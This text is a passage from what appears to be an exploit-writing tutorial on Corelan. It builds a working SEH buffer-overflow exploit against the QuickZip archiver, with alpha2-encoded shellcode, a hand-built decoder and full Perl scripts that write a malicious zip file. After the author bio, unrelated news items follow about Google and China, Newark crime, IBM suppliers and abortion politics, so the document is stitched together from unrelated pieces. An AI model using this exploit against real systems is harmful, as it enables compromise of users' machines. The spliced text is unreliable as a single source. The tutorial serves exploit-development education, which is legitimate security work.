" x32x2ex64x68x75x73x65x72x88x5cx24x0ax89xe6 " .
" x56xffx55x04x89xc2x50xbbxa8xa2x4dxbcx87x1c " .
" x24x52xe8x5exffxffxffx68x4cx41x4ex58x68x43 " .
" x4fx52x45x31xdbx88x5cx24x07x89xe3x68x72x73 " .
" x58x20x68x73x69x74x6fx68x67x20x76x69x68x20 " .
" x42x6cx6fx68x72x69x74x79x68x53x65x63x75x68 " .
" x69x76x65x20x68x66x65x6ex73x68x6cx20x4fx66 " .
" x68x6fx20x61x6cx68x69x6ex20x74x68x20x61x67 " .
" x61x68x73x20x68x69x68x20x73x61x79x68x30x64 " .
" x33x72x68x6cx61x6ex63x68x63x6fx72x65x31xc9 " .
" x88x4cx24x42x89xe1x31xd2x52x53x51x52xffxd0 " .
" x31xc0x50xffx55x08 " ; print " Writing code to file code.bin ...n " ; open ( FILE , " >code.bin " ) ; print FILE $ code ; close ( FILE ) ; root@krypt2:/pentest/exploits/alpha2# perl writecode.pl
Writing code to file code.bin ...
root@krypt2:/pentest/exploits/alpha2# ./alpha2 ebx -- uppercase > code.bin SYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBX
P8ACJJIN9JKMK8YRTGTL4FQXROBSJ6QO9E4LKRQ00LKBV4LLKD6U LLKPF38LKCNWPLK6V7H0OR82UL30YEQHQKOM13PLKRLFD7TLKG5W LLKPTS5SHUQJJLK0JEHLK1JWP31JKKS6WPILKP4LK31JNVQKOP1I PKLNLMTIP2TEZYQ8OTMEQXGKYZQKOKOKOGKSLWTQ8RUINLK1J7TE
QJKU6LK4LPKLKQJULEQZKLKUTLKUQJHMYPDVDUL3Q8CH2DHVIN4M
YKUMYO2RHLNPNDNZLPRZHMLKOKOKOMYPETDOKSN8XKR43MW5LVDP
RM8LKKOKOKOMYQUEX3XRLRL7PKORHWCGBVN3T3XT5T3SUBRK81LV
DUZK9KV0VKO1E5TK9XBPPOK98NB0MOLMWULQ41BM8QNKOKOKOU8P
L1QPN68581SPOPR0EVQYKLHQLVDEWK9M3E8T22SQH10RH43SY2T2
O3XCW7PT6BIU8GP0B2LBO3XD2U9T4RYU8PS553SRU5859SFU5WPR
HCVREBNBSU8RL7PPORFRHRO7P3QRLRHU9RNQ0D458Q0E1RG3Q2HR
SQ0CXCY3XWPT33QT9U80054VSBR3XRL3QBN2C2HRCBORR55VQ9YM XPLWTQRMYKQ6QN2QBF3PQF2KO8PP1YP0PKOPU4HA
So far so good .
We will place this encoded shellcode in the buffer after overwriting SEH .
Basereg Magic : preparing the custom decoder
Before we can even think about trying out this shellcode , we have to write some code to make ebx point at the first byte of the encoded shellcode .
When the 8 bytes of code at nseh and seh got executed , EBX does n’t really point at a useful value yet ( see screenshot below , it currently points at 0x7C9032A8 , an address from ntdll.dll ) .
So we need to write some code to correct this value , and make it point exactly at the first byte of the encoded shellcode .
That means that , between the overwritten SEH structure and the encoded shellcode , we will have to write some code .
In part 1 of this article , we learned that , because of the character set limitation , we need to use a custom decoder to do that .
In this scenario , we will be able to write this custom decoder in the payload buffer and position it after overwriting the SEH record .
The goal is to make ebx point to the encoded shellcode , so the encoded shellcode must be in a fixed / predictable location .
So in order to reserve some space for the custom decoder , and in order to put the shellcode in a predicatable location , we will use a block of 100 bytes .
100 bytes after overwriting SEH , to “ host ” the custom decoder + additional filler space ( up to 100 bytes ) , and then after these 100 bytes we ’ll put our encoded shellcode .
That means that our payload will look something like this :
[ junk1 ] +[ nseh ] +[ seh ] +[ code to align ebx & jump ebx ] +[ junk2 ] + [ encoded shellcode ] +[ junk3 ] [ 297 ] [ 4 ] [ 4 ] [ 100 bytes ] [ x bytes ] [ fill ]
where junk1 = offset to nseh , junk2 = amount of bytes needed to fill the space between the code to align ebx and the start location of that code + 100 bytes , and junk3 = the amount of bytes needed to fill the buffer up to 4064 bytes .
In the screenshot below , the address at EIP , which points right after the memory location where we land when the 4 bytes at SEH have been executed ( as instructions ) , is 0x0012FC04 .
That would mean that we need to place the shellcode at 0x0012FC04 + 100 bytes ( 0x64 bytes ) .
The goal is to use these 100 bytes to put 0x0012FC04 + 0x64 into EBX , and make the jump to ebx ( using the custom decoder ) .
Got it ?
There are a number of ways to get this value into ebx , but as stated above , you will have to write a custom decoder to do this , because the code you need to write needs to be “ filename - compatible ” .
Inside this custom decoder , you could for example hardcode 0x0012FC68 .
( BAD BAD BAD IDEA , even if the address appears to be static on your machine , and appears to be static even after a reboot ) .
You could also take a value from a register or from the stack , and you could even use getpc code and adding the offset .
But let ’s keep things simple here .
Perhaps we can kill 2 chocolates with one stone .
Think about it .
The custom decoder will push bytecode to the stack .
In order to be able to execute that bytecode , we will need to control the location where this code is written to , so we can get it to execute after it was reproduced .
That location is esp .
So perhaps we can use the same value as esp and put that in ebx , and use it as base address for doing the math .
That way , we may be able to do our math calculation and produce the desired address in ebx , based on that value .
There are a number of ways to modify esp .
We could copy a value from a register , or pop one from the stack .
If we have a good start value in esp , we can easily put it in ebx as well .
So , in short :
The custom decoder which we will use , will reproduce the opcodes to craft a value in ebx and will put those reproduced instructions in a certain location ( at esp )
A location we control .
( by modifying esp , and putting that value in ebx at the same time )
Next , when these instructions are written , they need to get executed .
When these instructions are executed , some bytes are added to ebx ( so ebx would point to the encoded shellcode ) and then we need to jump to it .
That ’s all there ’s to it .
More magic : Determining the decoder ’s target location
First you need to determine where the decoder will write the reproduced code to .
In the previous article , we found a way to write the reproduced code directly after the custom decoder , by popping values from the stack and putting a value below the decoder on in ESP .
( When the decoder finished running , the reproduced code gets executed ‘ automagically ’ because it was written just below the decoder . )
We also remember that the instructions to put a value into ESP , must use filename - compatible bytecode only .
Take a look at the registers and the stack right after the 8 bytes of code ( nseh + seh ) got executed .
It does n’t look like we can use the same technique this time .
Not a single register points to a location that points below the custom decoder .
And at first sight , we cannot seem to find a good address that points to a useful location below the custom decoder on the stack either :
So , what would you do ?
This is what I did : Instead of writing the reproduced code below the custom encoder , I will write it above and I will make a jump back .
After all , we can still use conditional jumps ( including backward jumps ) , as we have learned in part 1 of the article series .
And we still meet our ultimate goal : we have a reliable address in esp , and it can be used as base for calculating the value that needs to be put in ebx too .
Look at the stack .
The 3rd value on the stack may be useful :
0x0012FBFC .
( = This is where our nseh ( 0x41 0x41 0x41 0x41 ) is located – but that ’s just FYI .
After all , at this point , we are way past the point where nseh and seh are important / used , so it ’s ok if we overwrite these bytes )
If we can put this value ( 0x0012 FBFC ) into esp and into ebx prior to reproducing the code ( =running the decoder ) , we will end up writing above the custom decoder .
At the end of the custom decoder , we just need to jump back to get that code to execute and we ’re done .
Note : look back at the stack .
You could have used 0012F990 ( first address ) as well .
This address also points above the current location , but you would have to write a series of backward jumps to get to that location .
Or , alternatively , you could put the first address in ebx , and the third one in esp ; and use 0012F990 as base value for the math exercise .
All of this is perfectly , but why make things more complex if it ’s not really necessary .
Writing the code to craft a value in ebx and esp
In order to get a good value into ebx , we decided to take the third value from the stack , put it in esp ( so the decoder will write the reproduced code in a reliable location ) , and also in ebx ( so it can be used as start value for the reproduced code ) .
It is clear that the code to put this address into esp and ebx needs to be executed prior to running the custom decoder .
A simple way to achieve this is :
pop ebx
pop ebx
pop ebx
push ebx
pop esp
or , in opcode :
0x5 b 0x5 b 0x5b 0x53 0x5c
Oops – bad chocolate
Ah – there ’s a problem with this .
The opcode for pop ebx is not filename compatible .
0x5B = “ [ “ .
Try it – this character will break the exploit .
That also means that we can not use ebx as basereg .
We have to use something different .
ECX would do better .
The opcode to pop ecx is 0x59 , and that corresponds with “ Y ” .
The opcode to perform push ecx is 0x51 ( which is fine too : “ Q ” )
That means that we need to change the code and use ecx instead of ebx .
We also need to use ecx as basereg as well .
( So we simply have to re-encode the shellcode using ecx as basereg .
We ’ll take care of that later on ) .
pop ecx ( 0x59 )
pop ecx ( 0x59 )
pop ecx ( 0x59 )
push ecx ( 0x51 )
pop esp ( 0x5 c )
Let ’s put everything we have so far into one script .
The two most important components in our modified script are :
the opcode to put the start value in esp and ecx
the filler ( 100 bytes between the first byte after SEH and the position where we will put our encoded shellcode later on )
my $ filename= " corelan2.zip " ; my $ ldf_header = " x50x4Bx03x04x14x00x00 " .
" x00x00x00xB7xACxCEx34x00x00x00 " .
" x00x00x00x00x00x00x00x00 " . " xe4x0 f " . " x00x00x00 " ; my $ cdf_header = " x50x4Bx01x02x14x00x14 " .
" x00x00x00x00x00xB7xACxCEx34x00x00x00 " .
" x00x00x00x00x00x00x00x00x00 " .
" xe4x0 f " .
" x00x00x00x00x00x00x01x00 " .
" x24x00x00x00x00x00x00x00 " ; my $ eofcdf_header = " x50x4Bx05x06x00x00x00 " .
" x00x01x00x01x00 " .
" x12x10x00x00 " .
" x02x10x00x00 " . " x00x00 " ; my $ nseh= " x41x41x41x41 " ; #INC ECX = NOP my $ seh = " x65x47x7ex6d " ; # pop pop ret from d3dxof.dll = NOP my $ payload = " A " x 297 .
$ nseh .
$ seh ; #pop ecx , pop ecx , pop ecx , push ecx , pop esp my $ predecoder = " x59x59x59x51x5c " ; my $ decoder= " " ; $ payload=$payload.$predecoder .$ decoder ; my $ filltoebx= " B " x ( 100 - length ( $ predecoder . $decoder ) ) ; my $ rest = " C " x ( 4064 - length ( $payload.$filltoebx ) ) . " .txt " ; $ payload = $ payload.$filltoebx.$rest ; print " Payload size : " . length ( $ payload ) . " n " ; print " [+]
Removing $ filenamen " ; system ( " del $ filename " ) ; print " [+]
Creating new $ filenamen " ; open ( FILE , " > $ filename " ) ; print FILE $ ldf_header.$payload.$cdf_header.$payload.$eofcdf_header ; close ( FILE ) ;
( note : we will replace the C’s at $ rest with the encoded shellcode later on )
Create a zip file with this code , load it in quickzip and trigger the overflow .
After pop pop ret is executed , we see this :
Step through until after the POP ESP instruction ( at 0x0012FC08 ) and take a look at ECX and ESP :
That looks fine .
Both registers now contain the value we expected .
The value in ESP will make sure our decoder writes the original / reproduced code at a predictable location , and the value in ECX will be used as baseaddress for the encoded shellcode .
Building the decoder
Now we need to write the custom decoder that would add some bytes to ecx , to make it point at the begin of the encoded shellcode , and then jump to it .
The offset we need to add to ecx can be calculated like this : 0x0012FC04 ( location of our code right after SEH ) +0x64h ( 100 bytes ) – 0x0012 FBFC ( start value in ecx ) = 0x6C
The asm code to add this offset to ecx and then make the jump , looks like this :
add ecx,0x6
c
jmp ecx
In opcode :
In my previous article , I have already explained the steps to build a custom decoder which will reproduce 4 bytes of code at a time , so I wo n’t explain the details again .
The first 4 bytes that need to be reproduced and pushed onto the stack are 0x00 0x00 0xff 0xe1 :
" x25x4Ax4Dx4Ex55 " .
#zero eax " x25x35x32x31x2A " .
" x2Dx55x55x55x5 F " .
# put value in eax " x2Dx55x55x55x5 F " . " x2Dx56x55x56x5 F " .
Add a push eax ( 0x50 ) instruction to push these 4 bytes to the stack .
ESP currently points at 0x0012FBFC , so these 4 bytes will be put at 0x0012FBF8 . )
The last 4 bytes that need to be reproduced are 0x81 0xc1 0x6 c 0x00 :
" x25x4Ax4Dx4Ex55 " .
#zero eax " x25x35x32x31x2A " .
" x2Dx2Ax6Ax31x55 " .
# put value in eax " x2Dx2Ax6Ax31x55 " .
" x2Dx2Bx5Ax30x55 " .
Again , add push eax ( 0x50 ) at the end , which will push the reproduced 4 bytes onto the stack .
Finally , add a jump back at the end of the decoder : 0x73 0xf7 ( because of the character set conversion , this will get converted to 0x73 0x98 , making a backward jump of 101 bytes .
And that should make us land in the A’s before the reproduced decoder )
Note : A = 0x41 = INC ECX .
We are using ECX as baseregister for calculating the encoded shellcode ’s basereg , so we can not use A’s …
They would change the value in ecx , and that would break our offset calculation .
That means that we must use a different character as junk before nseh , a character that would also act as a nop slide .
B’s would work just fine ( INC EDX ) .
We will put the custom decoder in the block of 100 bytes right after the $ predecoder .
The rest of the 100 bytes will be filled with B’s .
After the 100 B’s ( where the encoded shellcode need to be placed ) , we still have a bunch of C’s .
So when the decoder has finished running , and the reproduced code gets executed , we should see that ECX points at the first C .
The entire script , including decoder and jump back after the decoder , looks like this :
my $ filename= " corelan2.zip " ; my $ ldf_header = " x50x4Bx03x04x14x00x00 " .
" x00x00x00xB7xACxCEx34x00x00x00 " .
" x00x00x00x00x00x00x00x00 " . " xe4x0 f " . " x00x00x00 " ; my $ cdf_header = " x50x4Bx01x02x14x00x14 " .
" x00x00x00x00x00xB7xACxCEx34x00x00x00 " .
" x00x00x00x00x00x00x00x00x00 " .
" xe4x0 f " .
" x00x00x00x00x00x00x01x00 " .
" x24x00x00x00x00x00x00x00 " ; my $ eofcdf_header = " x50x4Bx05x06x00x00x00 " .
" x00x01x00x01x00 " .
" x12x10x00x00 " .
" x02x10x00x00 " . " x00x00 " ; my $ nseh= " x41x41x41x41 " ; #INC ECX = NOP my $ seh = " x65x47x7ex6d " ; # pop pop ret from d3dxof.dll = NOP my $ payload = " B " x 297 .
$ nseh .
$ seh ; # B = INC EDX # pop ecx , pop ecx , pop ecx , push ecx , pop esp my $ predecoder = " x59x59x59x51x5c " ; my $ decoder = " x25x4Ax4Dx4Ex55 " .
#zero eax " x25x35x32x31x2A " .
" x2Dx55x55x55x5 F " .
# put value in eax " x2Dx55x55x55x5 F " .
" x2Dx56x55x56x5 F " . " x50 " .
# push eax " x25x4Ax4Dx4Ex55 " .
#zero eax " x25x35x32x31x2A " .
" x2Dx2Ax6Ax31x55 " .
# put value in eax " x2Dx2Ax6Ax31x55 " .
" x2Dx2Bx5Ax30x55 " . " x50 " .
#push eax " x73xf7 " ; #jump back 101 bytes $ payload=$payload.$predecoder .$ decoder ; my $ filltoebx= " B " x ( 100 - length ( $ predecoder . $decoder ) ) ; my $ rest = " C " x ( 4064 - length ( $payload.$filltoebx ) ) . " .txt " ; $ payload = $ payload.$filltoebx.$rest ; print " Payload size : " . length ( $ payload ) . " n " ; print " [+]
Removing $ filenamen " ; system ( " del $ filename " ) ; print " [+]
Creating new $ filenamen " ; open ( FILE , " > $ filename " ) ; print FILE $ ldf_header.$payload.$cdf_header.$payload.$eofcdf_header ; close ( FILE ) ;
Create zip , load the zip file ( notice : the folder now starts with B’s instead of A’s ) :
Trigger the crash , let pop pop ret execute , and then step all the way until right before the jump back instruction that sits at the bottom of the custom decoder .
Each decoder block has written 4 bytes to the stack .
Because we made ESP point at 0x0012FBFC before the decoder started to run , the code is written a few bytes above the decoder itself .
ECX also contains 0x0012FBFC , as expected .
When the backward jump is made , EIP jumps back to 0x0012FBD7 , which is 29 bytes before the reproduced code .
At that location , we land in our buffer with B’s ( =0x42 = inc edx ) .
The series of INC EDX instructions will not break anything , so eventually the ADD ECX,6C and JMP ECX will get executed .
Note : we used a block of 100 bytes for the custom decoder .
You can obviously optimize it and decrease this block size .
You will have to change the code inside the custom decoder to reflect the new block size … can be done easily .
Right after ADD ECX,6C gets executed , we see that ECX now points at the begin of the C’s ( so our offset calculation was correct . )
All we need to do now is put our encoded shellcode instead of the C’s , and we should be done .
Put shellcode in place
First , verify that you re-encoded the shellcode with basereg ecx :
/ alpha2 ecx -- uppercase > code.bin
( I used uppercase , but it should work without uppercase too )
Put the encoded shellcode in the exploit script , and fill up the remaining buffer with C’s :
my $ filename= " corelan2.zip " ; my $ ldf_header = " x50x4Bx03x04x14x00x00 " .
" x00x00x00xB7xACxCEx34x00x00x00 " .
" x00x00x00x00x00x00x00x00 " . " xe4x0 f " . " x00x00x00 " ; my $ cdf_header = " x50x4Bx01x02x14x00x14 " .
" x00x00x00x00x00xB7xACxCEx34x00x00x00 " .
" x00x00x00x00x00x00x00x00x00 " .
" xe4x0 f " .
" x00x00x00x00x00x00x01x00 " .
" x24x00x00x00x00x00x00x00 " ; my $ eofcdf_header = " x50x4Bx05x06x00x00x00 " .
" x00x01x00x01x00 " .
" x12x10x00x00 " .
" x02x10x00x00 " . " x00x00 " ; my $ nseh= " x41x41x41x41 " ; #INC ECX = NOP my $ seh = " x65x47x7ex6d " ; # pop pop ret from d3dxof.dll = NOP my $ payload = " B " x 297 .
$ nseh .
$ seh ; # B = INC EDX # pop ecx , pop ecx , pop ecx , push ecx , pop esp my $ predecoder = " x59x59x59x51x5c " ; my $ decoder = " x25x4Ax4Dx4Ex55 " .
#zero eax " x25x35x32x31x2A " .
" x2Dx55x55x55x5 F " .
# put value in eax " x2Dx55x55x55x5 F " .
" x2Dx56x55x56x5 F " . " x50 " .
# push eax " x25x4Ax4Dx4Ex55 " .
#zero eax " x25x35x32x31x2A " .
" x2Dx2Ax6Ax31x55 " .
# put value in eax " x2Dx2Ax6Ax31x55 " .
" x2Dx2Bx5Ax30x55 " . " x50 " .
#push eax " x73xf7 " ; #jump back 101 bytes $ payload=$payload.$predecoder .$ decoder ; my $ filltoecx = " B " x ( 100 - length ( $ predecoder . $decoder ) ) ; #alpha2 encoded - skylined - basereg ECX my $ shellcode = " IIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABT " .
" AAQ2AB2BB0BBXP8ACJJIN9JKMKXYBTGTJTVQ9B82BZVQYYE4LK2Q6P " .
" LKBVTLLKT65LLK0F38LKCNWPLKP6VX0ODX3EKCF95QHQKOKQE0LK2L " . " Q4FDLK1UWLLK64S5BXUQJJLK1Z5HLK1JQ0UQJKM3P7PILKWDLKUQJN " .
" P1KO6QO0KLNLMTO02T4JIQXOTMS1O7M9JQKOKOKO7KCLFD18RU9NLK " .
" PZQ45 QJKCVLKTLPKLKPZ5L31ZKLK5TLKUQM8MYQTQ45L3Q9SNRUX7Y " . " N4MYKUMYO258LNPNTNZLV2KXMLKOKOKOK9W534OK3NN8JBBSLGELQ4 " .
" PRJHLKKOKOKOMY1UTHSXBLBL7PKOSXP36RVNE4U8CEBSSUT2LH1LWT " .
" UZK9JFPVKO0US4K9IR60OKOXORPMOLMW5LQ4F2M81NKOKOKO2HPLW1 " .
" PNF8U8W3POV275P1IKK81LWT37MYKSU8BRT31HWPRH2SCYSDRO3XSW " .
" 102VSY3XWPQR2LBOCXT259RT49U80S3UBC2U58CYRVSUWPSX56E5BN " . " T3U82L7PPOCVSX2OQ0SQRLRHRIRNQ04458WPCQSWU1SX3CQ0SXRI2H " . " WPBSU1RYU8P0CTFSBRE8RL3Q2NU3CXRC2OD2U56QHIK80LGT1RK9KQ " . " VQN2F2PSPQ0RKON0P1IPPPKO0U5XA
" ; my $ rest = " C " x ( 4064 - length ( $payload.$filltoecx.$shellcode ) ) . " .txt " ; $ payload = $ payload.$filltoecx.$shellcode.$rest ; print " Payload size : " . length ( $ payload ) . " n " ; print " [+]
Removing $ filenamen " ; system ( " del $ filename " ) ; print " [+]
Creating new $ filenamen " ; open ( FILE , " > $ filename " ) ; print FILE $ ldf_header.$payload.$cdf_header.$payload.$eofcdf_header ; close ( FILE ) ;
Chocolate meltdown : Click click boom
About the author
Peter Van Eeckhoutte ( a.k.a. “ corelanc0d3r ” ) has been working in IT System Engineering and Security since 1997 .
He currently serves as IT Infrastructure Manager and Security Officer .
He is owner of the Corelan Blog , author of several exploit writing tutorials , a variety of free tools , maintains / moderates an exploit writing forum , and founder of the Corelan Team , which is a group of people that share the same interests : gathering and sharing knowledge .
Peter is 35 years old and currently lives in Deerlijk , Belgium .
You can follow him on twitter or reach him via peter dot ve [ at ] corelan {dot} be .
Thanks to
My buddies at Corelan Team , and Offensive Security ( muts ) for giving me the opportunity to write and publish this article on their blog .
After a Reuters report on Friday cited China 's Industry and Information Minister , Li Yizhong , as having told an indeterminate parliamentary body that the government was in talks with Google over its claims of having been hacked in early February by a Chinese malicious source , a vice minister for the same government agency issued a statement through China 's Xinhua news agency denying any negotiations have taken place at all .
The denial was covered by Reuters as a request by the ministry for more information , so that China could prosecute Google 's complaint .
The Xinhua report itself ( not a Google English - language translation of the report ) states the Ministry of Industry and Information Technology 's position that Google never filed a complaint in the first place .
Last Tuesday , Xinhua quoted a spokesperson for a key Chinese political advisory body , Zhao Qizheng , as strongly denying Google 's allegations of Chinese malicious hacking , specifically the implication that the government was involved .
But being consistent , Qizheng and the Xinhua report were careful not to call Google 's accusation a " charge . "
Advertisement
If one reads the Xinhua reports at face value -- putting aside Reuters ' interpretations of them -- they could represent China 's attempt to call Google 's bluff .
Ever since the incident , the state - run news agency has reiterated that Google has threatened to pull out of the country , but has not done so .
And a political cartoon published by Xinhua last Friday , entitled " Google and the Spooks , " depicts the political association it would prefer Chinese citizens draw in their minds .
It shows the familiar Google search page , with the logo embellished with Nixonian eyes and an American flag necktie bearing a National Security Agency seal .
The prevailing theory , put forth last month in The New York Times , is that the perpetrators of the alleged incident may have been vo-tech students of a certain Ukrainian professor who has been suspected of online mischief before .
While on the surface that might appear to exonerate the Chinese government , the Times ' source , a noted intelligence research analyst , warned readers not to draw that conclusion too quickly , saying the Chinese " have a different model " for exploiting targets .
That source may have helped the Times uncover that Google had been working with the NSA to determine the source of the incident .
A sociologist and Anglican priest says atheists or people without a specific religion are creating the most problems for inter - faith tolerance in Australia .
Monash University Professor Gary Bouma says people without a specific faith are fuelling sectarian conflict and cause division in society .
" Conflict comes up when groups vilify , deny the right to build the mosques , " he told the Studies of Religion in Focus conference in Sydney today .
" Or when the ' nones ' - those who are anti-theist - [ say ] ' You 're stupid ' , that religious voices should be driven out of the public policy area , that religion should n't be in schools , etc .
" That is conflict , and that is highly divisive in this society . "
Professor Bouma says a growth in religious diversity in recent years has created problems for Australian schools .
He says schools have to work out to how to encourage respectful engagement between students and teachers of various religions .
" Schools have a whole variety of competing loyalties within the teachers and within the students , " he said .
" It can sometimes go to conflict if there 's a viewpoint that some do n't want expressed .
" But how is it that you accommodate the diversity ?
How is it that you develop respectful engagement between diverse groups ? "
NEWARK —
For the first time in more than 40 years , an entire calendar month has come and gone without a homicide in the state ’s largest city .
It 's been 32 days since a homicide took place in Newark , marking the first time there has been a slay - free calendar month in the city since 1966 .
Police Director Garry McCarthy said he hopes to best a 43 - day period from March to April of 2008 , the longest span of time without a slaying in the city since 1961 .
Ten homicides have occurred in Newark since Jan. 1 , and none have taken place in the South Ward , long believed to be Newark 's most dangerous section .
The first - quarter homicide total is the same as last year 's , and the second - lowest in Newark since 1941 .
There were only eight reported shootings in Newark in March , and aggravated assaults , robberies , carjackings and other major crime rates are all down for the first - quarter of 2010 compared to their 2009 totals .
The statistical quarter , which spans the first thirteen weeks of the year , officially ended on March 28th .
Previous Coverage :
• Irvington man is Newark 's first homicide victim in 43 days
• Pa. man shot to death in Newark is first homicide of year
Last week President Obama quietly announced that he would nominate Michele Leonhart to lead the Drug Enforcement Agency .
Ms. Leonhart , who was appointed and promoted by George W. Bush , oversaw the Bush administration ’s tactic of raiding the homes of desperately ill individual medical marijuana patients in California .
Ms. Leonhart also has a record of adamantly fighting against allowing scientific research of the potential medicinal value of marijuana .
Ignoring the ruling of a federal judge , Ms. Leonhart single - handedly blocked applications from respected university researchers studying medical marijuana .
Tell your Senator not to confirm Ms. Leonhart .
We need a DEA leader who understands the potential value of medical marijuana -- not a Bush - era holdover who thought raiding the homes of cancer patients was a good idea .
Corrected spelling of John Paterson ’s last name .
I.B.M. said on Wednesday that it will require its 28,000 suppliers in more than 90 countries to install management systems to gather data on their energy use , greenhouse gas emissions and waste and recycling .
Those companies in turn must ask their subcontractors to do the same if their products or services end up as a significant part of I.B.M.’s $ 40 billion global supply chain .
The suppliers must also set environmental goals and make public their progress in meeting those objectives .
“ We will be amongst the first , if not the first , with these broad - based markers on our supply base and we ’re going to have to spend an appropriate amount of time and money to help our suppliers do what we ’re asking them to do , ” John Paterson , vice president for I.B.M. ’s global supply and chief procurement officer , said in a telephone interview from Hong Kong .
“ It ’s clear that there ’s real financial benefits to be had for procurers across the world to get innovative with their suppliers , ” Mr. Paterson added .
“ In the long term , as the Earth ’s resources get consumed , prices are going to go up .
We ’ve already seen large price increases and problems with water . ”
The initiative follows Wal - Mart ’s announcement in February that it would require its suppliers to eliminate 20 million metric tons of greenhouse gas emissions from the life cycle of the products it sells .
I.B.M. , one of the world ’s largest technology companies , is not setting numerical goals for its suppliers to achieve .
Rather , the goal is to institutionalize data - gathering systems that will collect information on a variety of measures of environmental performance , according to Wayne Balta , the company ’s vice president for corporate environmental affairs and product safety .
“ Our overall interest is to systemize environmental management and sustainability across our global supply chain so it helps our suppliers build their own capacity in a way that ’s not only good for the environment but their business , ” Mr. Balta said .
“ It ’s about creating a system that works regardless of who is in leadership and what ’s in green vogue . ”
Mr. Paterson acknowledged the biggest challenge will be working with suppliers in regions of the world where sustainability is not as big an issue as it is in the United States and Europe .
But he pointed to a recent success in China , where he said I.B.M. helped one of its suppliers , a shipping company , redesign its own supply chain to reduce its carbon footprint by 15 percent .
I.B.M. said it spends 36 percent of its supply chain budget on suppliers in North America , while a third goes to companies in emerging markets like Brazil , China and India .
Mr. Paterson and Mr. Balta said I.B.M. had just begun notifying suppliers of the directive .
Primary responsibility for working with suppliers to implement the initiative will fall to I.B.M. buyers and procurement engineers .
While a deadline had not been set , Mr. Paterson said he would like suppliers to be in compliance by early 2011 .
And those that fail to get with the system ?
“ Ultimately , if a supplier cannot be compliant with requirements on the environment and sustainability , we ’ll stop doing business with them , ” he said .
The good news is , we can now control a pinball machine 's flippers with our brains , as this demo at Germany 's ceBIT Technology Fair proves .
The bad news is , it 's not going to make aspiring pinball hustlers look cool in bars .
Advertisement
The brain - controlled pinball machine is the work of the Berlin Brain - Computer Interface research consortium , and it is pretty amazing that you can now play a game solely with your brain impulses .
Images by Sean Gallup / Getty Images .
Although they 're against abortion themselves , Democratic Reps.
Bart Stupak ( left ) Kathleen Dahlkemper and Tom Perriello are likely to be targeted by anti-abortion groups .
| Composite image by POLITICO
It 's back : Abortion debate reignites
After nearly derailing the health care bill that passed the House on Sunday , the abortion issue is poised to make a political comeback , returning the familiar wedge issue to the campaign trail after a brief hiatus .
Both abortion - rights and anti-abortion groups say the experience of health care reform has served as a reminder of the stark consequences of elections — and of the need to elect reliable allies who will work hard to advance and defend their agendas .
Advertisement
The Family Research Council , which has already spent nearly $ 2 million this cycle backing anti-abortion candidates across the country , is now considering wading into battles against anti-abortion Democrats like Pennsylvania Rep. Kathleen Dahlkemper , Virginia Rep. Thomas Perriello , Indiana Rep. Brad Ellsworth and West Virginia Reps. Alan Mollohan and Nick Rahall — all of whom voted for the health care bill Sunday .
“ Because of what pro-lifers see as betrayal , it ’s personal now , ” said Tom McClusky , vice president of governmental affairs for the Family Research Council .
“ There ’s passion , but we want to make sure that passion is directed in the right place . ”
NARAL Pro-Choice America President Nancy Keenan told POLITICO that the lesson learned from the health care battle was that the abortion - rights movement , which has lacked the votes needed to shut down abortion funding language from anti-abortion Democrats throughout the health care reform push , needs more allies in Congress .
“ From our point of view , we are concentrated on changing those numbers , ” said Keenan .
“ We absolutely will be taking a look at those anti-abortion lawmakers , and if we can , we will take a run at them . ”
Rep. Bart Stupak ( D - Mich . ) , an abortion opponent who led the fight for restrictions on federal funding of abortion until cutting a deal with the White House that cleared the way for final passage on the bill Sunday , may find himself at the center of the storm .
In the hours after Stupak announced his compromise , the nine - term Michigan Democrat came under fierce attack from both sides of the abortion debate , including onetime ally Susan B. Anthony List , an anti-abortion group which stripped Stupak of its “ Defender of Life ” award .
“ Stupak has not only failed to stand strong for unborn children but also for his constituents and pro-life voters across the country , ” SBA List President Marjorie Dannenfelser said in a statement .
Abortion - rights organizations , meanwhile , accused Democrats of advancing language restricting abortion rights in the health care legislation .
“ On a day when Americans are expected to see passage of legislation that will make health care more affordable for more than 30 million citizens , it is deeply disappointing that Bart Stupak and other anti-choice politicians would demand the restatement of the Hyde Amendment , a discriminatory law that blocks low - income women from receiving full reproductive health care , ” Keenan said in a statement .
Already , Stupak ’s Upper Peninsula district is witnessing a surge in election activity linked to Stupak ’s role in the health care debate .
The National Organization for Women and MI List , a Michigan - based group that aims to elect women who support abortion rights , have weighed in for former Charlevoix County Commissioner Connie Saltonstall , who recently announced her Democratic primary challenge to Stupak .
Keenan hinted that NARAL would be announcing its plans for participating in the race in the days ahead .
“ I have gotten support from people all over the country , ” Saltonstall told POLITICO on Monday , noting that she had raised $ 75,000 since entering the race earlier this month .
“ It ’s been phenomenal the response we ’ve gotten . ”
On the Republican side , Dan Benishek , a Republican surgeon who is running against Stupak , saw a wave of interest in his candidacy after Sunday ’s vote .
Once considered a long - shot candidate , Benishek was scheduled for an appearance on conservative talk radio host Mark Levin ’s show Monday .
The Family Research Council ’s McClusky said there was little question that his organization would wade into the Stupak race .
“ His actions hit the hardest , ” said McClusky .
“ It ’s time for him to leave Congress . ”
In a brief interview prior to the vote Sunday , Stupak acknowledged that he and other anti-abortion Democrats had become a target from both sides of the debate .
“ I ’m sure pro-life organizations are not happy , ” said Stupak .
“ Will they give us grief ?
Yeah .
Yeah .
We stood on principle . ”
In the run-up to Sunday ’s vote , both sides of the abortion fight sought to frame their positions in terms of popular support .
SBA
List held a conference call with reporters to unveil polling the organization conducted in a slew of districts held by anti-abortion House Democrats , while NARAL unveiled a five - page polling memo detailing voter support for abortion .
“ Pro-choice Democratic women led the fight against the anti-choice forces led by Bart Stupak .
One thing was made incredibly clear , and that is with more pro-choice Democratic women in Congress , the way this debate unfolded could have been remarkably different , ” EMILY ’s List President Stephanie Schriock said in an e-mail .
“ As we celebrate all the benefits included in the bill for American women and families , EMILY ’s List is more determined than ever to elect women who will fight to protect women , their health and reproductive freedom . ”
Veteran Michigan Rep. Dale Kildee said he was confident fellow anti-abortion Democrats would weather the storm from outside groups .
“ They ’ll probably get some grief , but I think they ’ll be able to override it , ” Kildee told POLITICO outside the House chamber Sunday evening .
“ You face it every year .
They want total purity .
But they ’ll be able to handle that . ”
Republicans have also signaled they ’ll wage an aggressive fight over the divisive issue , with the National Republican Congressional Committee slamming Democrats in conservative seats for voting for a bill that they charged would weaken restrictions on abortion .
